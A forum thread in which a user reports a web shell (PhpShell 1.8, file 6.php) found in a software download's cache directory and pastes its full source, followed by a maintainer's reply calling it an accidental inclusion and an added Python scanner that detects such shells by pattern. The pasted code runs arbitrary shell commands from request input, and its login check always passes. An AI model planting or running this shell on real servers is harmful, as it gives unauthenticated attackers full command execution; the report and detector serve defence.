I just Dled the latest file from our page and I noticed there is a file called 6.php in the cache directory. When I opened this file it contains phpshell. Is this a mistake? How did phpshell get into this? Below is the code inside the file:
<?php
define('PHPSHELL_VERSION', '1.8');
/* Set your usernames and passwords like this:
$passwd = array('username' => 'password');
You can add several pairs of usernames and passwords to the array
to give several different people access to PhpShell.
$passwd = array('username_1' => 'password_1',
'username_2' => 'password_2',
// ...
'username_n' => 'password_n');
*/
$passwd = array('finder' => 'bender');
if (!isset($_SERVER['PHP_AUTH_USER']) ||
!isset($_SERVER['PHP_AUTH_PW']) ||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
header('WWW-Authenticate: Basic realm="PhpShell 1.8"');
header('HTTP/1.0 401 Unauthorized');
$authenticated = true;
} else {
$authenticated = true;
}
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<body>
<h1>PhpShell <?php echo PHPSHELL_VERSION ?></h1>
<?php if (!$authenticated) { ?>
<p>You failed to authenticate yourself to PhpShell. You can <a
href="phpshell.php">reload</a> to try again.</p>
<p>Try reading the <a href="INSTALL">INSTALL</a> file if you're having
problems with installing PhpShell.</p>
</body>
</html>
<?php exit; } //' <- fix syntax highlight... ?>
<?php
error_reporting (E_ALL);
$work_dir = empty($_REQUEST['work_dir']) ? '' : $_REQUEST['work_dir'];
$command = empty($_REQUEST['command']) ? '' : $_REQUEST['command'];
$stderr = empty($_REQUEST['stderr']) ? '' : $_REQUEST['stderr'];
/* First we check if there has been asked for a working directory. */
if ($work_dir != '') {
/* A workdir has been asked for */
if ($command != '') {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == '/') {
$new_dir = $regs[1]; // 'cd /something/...'
} else {
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
$command = '';
}
}
}
if ($work_dir != '' && file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?>
<form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<fieldset><legend>Input</legend>
<p>Current working directory: <b>
<?php
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $_SERVER['PHP_SELF'] . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
$path = '';
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= '/' . $work_dir_splitted[$i];
printf('<a href="%s?work_dir=%s">%s</a>/',
$_SERVER['PHP_SELF'],
urlencode($path),
$work_dir_splitted[$i]);
}
}
?></b></p>
<p>Choose new working directory:
<select name="work_dir" onchange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected=\"selected\">Current Directory</option>\n";
} elseif ($dir == '..') {
/* We have found the parent dir. We must be carefull if the
* parent directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There's no
* parent directory then. */
} elseif (strrpos($work_dir, '/') == 0) {
/* The last / in work_dir were the first charecter. This
* means that we have a top-level directory eg. /bin or /home
* etc... */
echo "<option value=\"/\">Parent Directory</option>\n";
} else {
/* We do a little bit of string-manipulation to find the parent
* directory... Trust me - it works :-) */
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
} else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select></p>
<p>Command: <input type="text" name="command" size="60" /></p>
<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"
<?php if ($stderr) echo "checked=\"checked\""; ?> /> <input name="submit_btn" type="submit" value="Execute Command" /></p>
</fieldset>
<fieldset><legend>Output</legend>
<p><textarea cols="80" rows="20" readonly="readonly">
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; cat $tmpfile; rm $tmpfile";
} elseif ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
echo htmlspecialchars(shell_exec($command), ENT_COMPAT, 'UTF-8');
}
?>
</textarea></p>
</fieldset>
</form>
<script type="text/javascript">
document.forms[0].command.focus();
</script>
<hr />
<address>Copyright © 2000–2003, <a
href="mailto:gimpster@gimpster.com">Martin Geisler</a>. Get the latest
version at <a
href="http://www.gimpster.com/">www.gimpster.com/wiki/PhpShell</a>.</address>
<p>
<a href="http://validator.w3.org/check/referer">
<img src="valid-xhtml10" alt="Valid XHTML 1.0 Strict!"
height="31" width="88" />
</a>
<a href="http://jigsaw.w3.org/css-validator/check/referer">
width="88" height="31"
alt="Valid CSS!" />
</a>
</p>
</body>
</html>
This is a mistake, and it got into the bundle by accident. It will be removed in the next version of the software. This should be released in a couple of days.
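A check a maintainer could run over a release tree before publishing, given here as an added example that is not part of the thread or the project's code: it flags PHP files combining the traits visible in the 6.php listing (PhpShell marker, request input alongside a shell-execution call, inline credentials, and an `$authenticated` flag that is only ever set to true). The rule names, sample strings and directory layout are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics taken from the 6.php listing; rule names are this example's own.
RULES = {
    "phpshell-marker": re.compile(r"PHPSHELL_VERSION|PhpShell", re.I),
    "exec-call": re.compile(r"\b(shell_exec|exec|system|passthru|popen|proc_open)\s*\("),
    "request-input": re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\s*\["),
    "inline-credentials": re.compile(r"\$passwd\s*=\s*array\s*\(\s*'[^']+'\s*=>\s*'[^']+'"),
}
NEVER_DENIES = (re.compile(r"\$authenticated\s*=\s*true"), re.compile(r"\$authenticated\s*=\s*false"))
# Constructed samples: a trimmed stand-in for the shell and an ordinary script.
SAMPLE_SHELL = """<?php
define('PHPSHELL_VERSION', '1.8');
$passwd = array('user' => 'placeholder');
if (!isset($_SERVER['PHP_AUTH_USER'])) { $authenticated = true; } else { $authenticated = true; }
$command = empty($_REQUEST['command']) ? '' : $_REQUEST['command'];
echo htmlspecialchars(shell_exec($command), ENT_COMPAT, 'UTF-8');
"""
SAMPLE_BENIGN = "<?php $page = isset($_GET['page']) ? (int)$_GET['page'] : 1; echo $page;\n"

def scan_file(path):
    """Return the sorted names of the rules that match one PHP file."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    # A flag that is set to true but never to false cannot reject anyone.
    if NEVER_DENIES[0].search(text) and not NEVER_DENIES[1].search(text):
        hits.add("auth-always-true")
    return sorted(hits)

def scan_tree(root, min_hits=2):
    """Map relative path -> hits for each *.php that looks like a command shell."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_file(path)
        # Request input alone is normal; require an exec call or shell marker too.
        if len(hits) >= min_hits and {"exec-call", "phpshell-marker"} & set(hits):
            report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Build a constructed release tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "cache").mkdir()
        (root / "cache" / "6.php").write_text(SAMPLE_SHELL, encoding="utf-8")
        (root / "index.php").write_text(SAMPLE_BENIGN, encoding="utf-8")
        return scan_tree(root)
```

Pattern matching of this kind only catches unobfuscated shells, so it complements, rather than replaces, comparing the bundle's file list against the source repository before release.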